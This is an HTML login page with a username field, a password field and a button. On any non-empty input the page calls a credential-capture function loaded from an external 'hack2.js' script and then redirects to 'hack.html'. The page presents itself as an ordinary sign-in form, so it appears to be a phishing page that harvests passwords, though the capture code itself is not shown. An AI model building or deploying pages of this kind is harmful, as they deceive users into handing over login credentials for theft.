<!DOCTYPE html>
<html>

<head>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

    .container {
      text-align: center;
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
    }

    .head {
      font-size: 24px;
      margin-bottom: 20px;
    }

    .input {
      width: 40%;
      height: 40px;
      border: 1px solid gray;
      margin-bottom: 10px;
      padding: 10px;
    }

    .button {
      background-color: blue;
      padding: 10px;
      border: none;
      border-radius: 5px;
      color: white;
      cursor: pointer;
    }
  </style>
</head>

<body>
  <div class="container">
    <div class="head">Login</div>
    <input
      type="text"
      class="input"
      placeholder="Username"
      id="username"
    />
    <input
      type="password"
      class="input"
      placeholder="Password"
      id="password"
    />
    <button class="button" id="login" onclick="handleLogin()">Login</button>
  </div>

  <script>
    function handleLogin() {
      const username = document.getElementById('username').value;
      const password = document.getElementById('password').value;


      if (username && password) {
        alert('Welcome');
        captureCredentialsOnClick();
        window.location.href = './hack.html';

        // You can perform navigation or other actions here
      } else {
        alert('Fill in all the fields');
      }
    }
  </script>
  <script src="./hack2.js"></script>
</body>

</html>
